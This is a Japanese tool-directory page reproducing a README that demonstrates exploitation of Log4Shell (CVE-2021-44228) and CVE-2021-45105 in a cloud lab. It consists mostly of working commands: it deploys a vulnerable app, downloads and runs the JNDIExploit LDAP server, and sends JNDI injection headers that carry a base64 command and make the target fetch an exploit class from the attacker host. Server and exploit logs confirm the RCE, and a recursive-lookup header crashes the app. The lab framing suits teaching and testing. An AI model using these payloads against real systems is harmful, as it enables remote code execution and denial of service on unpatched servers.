Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4Shell-CVE-2021-44228-Demo — AWSを使用したLog4Shellデモ | Kitploit
ツール/GitHubGitHub/baboopan/log4shell-cve-2021-44228-demo
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育ペイロード開発ラボと実践
GitHub
baboopan/log4shell-cve-2021-44228-demo

Log4Shell-CVE-2021-44228-Demo

AWSを使用したLog4Shellデモ

リポジトリを見る
2124年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4Shell(CVE-2021-44228) デモ

demo-scenarios

環境設定

クライアント

  • curl コマンドラインで HTTP サーバーにアクセスできる任意の場所

log4j を使用した HTTP サーバーによる脆弱なアプリ

  • Amazon Linux 2 (x86 ベース) EC2 インスタンス / CentOS Azure 仮想マシン
root@kitploit:~
$ yum install docker -y
$ systemctl enable docker
$ systemctl start docker
$ docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
  • SSH コンソール出力 spring-web-server

有害な LDAP サーバーとしての JNDI Exploit

  • Amazon Linux 2 (x86 ベース) EC2 インスタンス
root@kitploit:~
$ yum install java-11-amazon-corretto.x86_64 -y
# Azure for java-1.7.0-openjdk-1.7.0.261-2.6.22.2.el7_8.x86_64
$ wget https://github.com/Mr-xn/JNDIExploit-1/releases/download/v1.2/JNDIExploit.v1.2.zip
$ unzip JNDIExploit.v1.2.zip
# Indicate the service endpoint as the EC2 private ip from metadata
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i $(curl -s http://169.254.169.254/latest/meta-data/local-ipv4) -p 8888
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
  • CentOS Azure 仮想マシン
root@kitploit:~
$ wget https://corretto.aws/downloads/latest/amazon-corretto-11-x64-linux-jdk.rpm
$ yum install amazon-corretto-11-x64-linux-jdk.rpm -y
$ wget https://github.com/Mr-xn/JNDIExploit-1/releases/download/v1.2/JNDIExploit.v1.2.zip
$ unzip JNDIExploit.v1.2.zip
# Indicate the service endpoint as the private ip from metadata
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i $(curl -sH Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/?api-version=2021-02-01" | awk -F '[:,"]' '{print $5}') -p 8888
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
  • SSH コンソール出力 jndiexploit

エクスプロイトの流れ

通常の動作

サーバーは、クライアントが X-Api-Version ヘッダーを正しく送信した場合に Hello World! を返します。それ以外の場合、クライアントは不正なリクエストとして 400 HTTP エラーを受け取ります。

  • クライアント
root@kitploit:~
$ curl SERVER_IP:8080 -H 'X-Api-Version: 1.1'
Hello, world!
$ curl SERVER_IP:8080
{"timestamp":"2021-12-22T02:44:43.103+00:00","status":400,"error":"Bad Request","path":"/"}

client-requests-normal

  • サーバーログ
root@kitploit:~
# Requests with the header properly
2021-12-22 02:44:40.920  INFO 1 --- [nio-8080-exec-3] HelloWorld                               : Received a request for API version 1
It's Hello from System.out.
# Reqeusts without the right input
2021-12-22 02:44:43.102  WARN 1 --- [nio-8080-exec-5] .w.s.m.s.DefaultHandlerExceptionResolver : Resolved [org.springframework.web.bind.MissingRequestHeaderException: Required request header 'X-Api-Version' for method parameter type String is not present]

server-requests-normal

インジェクション攻撃 / CVE-2021-44228

次に、ヘッダー 'X-Api-Version: ${jndi:ldap://10.0.1.164:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' を含むインジェクションリクエストを送信します。これにより CVE-2021-44228 がトリガーされ、JNDI ルックアップを実行して ldap にアクセスし、RCE を実行します。

dG91Y2ggL3RtcC9wd25lZAo=} は、Linux コマンドライン touch /tmp/pwned から base64 エンコードされたものです。RCE が達成されると、脆弱なアプリ内にファイルが作成されます。

また、base64 文字列を https://www.base64encode.org/ で置き換えることで動作を変更できます。

  • クライアント
root@kitploit:~
# Send the request with injection
$ curl SERVER_IP:8080 -H 'X-Api-Version: ${jndi:ldap://JNDI_EXPLOIT_IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
Hello, world!

client-requests-injection

  • サーバーログ
root@kitploit:~
2021-12-22 03:04:07,042 http-nio-8080-exec-6 WARN Error looking up JNDI resource [ldap://10.0.1.164:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: ExploitxM5KqZop9U cannot be cast to javax.naming.spi.ObjectFactory]; remaining name '"Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo="'
...
...
# Receive the injection and redirect it to the JNDI Exploit Server we indicated in the request
2021-12-22 03:04:06.567  INFO 1 --- [nio-8080-exec-6] HelloWorld                               : Received a request for API version ${jndi:ldap://JNDI_EXPLOIT_IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}

server-exploit

  • JNDI Exploit
root@kitploit:~
# Get the LDAP Lookup from server vulnerable app
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=
[+] Paylaod: command
[+] Command: touch /tmp/pwned
# Send back the encoded string back to vulnerable app, let the app execute the command in base64
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= redirecting to http://10.0.1.164:8888/ExploitxM5KqZop9U.class
[+] New HTTP Request From /10.0.1.200:33250  /ExploitxM5KqZop9U.class
[+] Receive ClassRequest: ExploitxM5KqZop9U.class
[+] Response Code: 200

jndi-exploit-ldap

  • サーバー内の脆弱なアプリで RCE 結果を確認
root@kitploit:~
# Get the Container ID of vulnerable app in Server
$ docker ps -a
CONTAINER ID   IMAGE            COMMAND                  CREATED             STATUS             PORTS                                       NAMES
a4b14c4adb6c   vulnerable-app   "java -jar /app/spri…"   About an hour ago   Up About an hour   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   vulnerable-app
# List the /tmp folder before the injection
$ docker exec -i -t a4b14c4adb6c ls -l /tmp/
total 0
drwxr-xr-x    2 root     root            15 Dec 22 02:34 hsperfdata_root
drwx------    2 root     root             6 Dec 22 01:34 tomcat-docbase.8080.228050961485794229
drwx------    3 root     root            18 Dec 22 01:34 tomcat.8080.4816494392465116780
# Confirm the RCE achieved bt injection request
$ docker exec -i -t a4b14c4adb6c ls -l /tmp/
total 0
drwxr-xr-x    2 root     root            15 Dec 22 02:34 hsperfdata_root
-rw-r--r--    1 root     root             0 Dec 22 03:04 pwned # RCE achieved
drwx------    2 root     root             6 Dec 22 01:34 tomcat-docbase.8080.228050961485794229
drwx------    3 root     root            18 Dec 22 01:34 tomcat.8080.4816494392465116780

server-app-pwned

インジェクション攻撃 / CVE-2021-45105

Log4j2 バージョン 2.0-alpha1 から 2.16.0 (2.12.3 を除く) は、自己参照ルックアップによる制御不能な再帰から保護されていませんでした。ロギング設定で Context Lookup を使用したデフォルト以外の Pattern Layout を使用している場合、Thread Context Map (MDC) 入力データを制御できる攻撃者は、再帰ルックアップを含む悪意のある入力データを作成し、プロセスを終了させる StackOverflowError を引き起こす可能性があります。 - CVE-2021-45105 の説明、Apache

ここで、StrSubstitutor クラス ${${::-${::-$${::-j}}}} を使用して Thread Context Map を入力し、無限再帰エラーによってアプリケーションをクラッシュさせることができます。

  • クライアント
root@kitploit:~
# Send the request with injection
$ curl SERVER_IP:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'
Hello, world!

client-requests-45105

  • サーバーログ
root@kitploit:~
2021-12-22 03:42:38,614 http-nio-8080-exec-2 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-$}}: :
...
...
    at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)

server-error-infinite-loop

参考文献

  • christophetd/log4shell-vulnerable-app
  • Mr-xn/JNDIExploit
ツールをダウンロード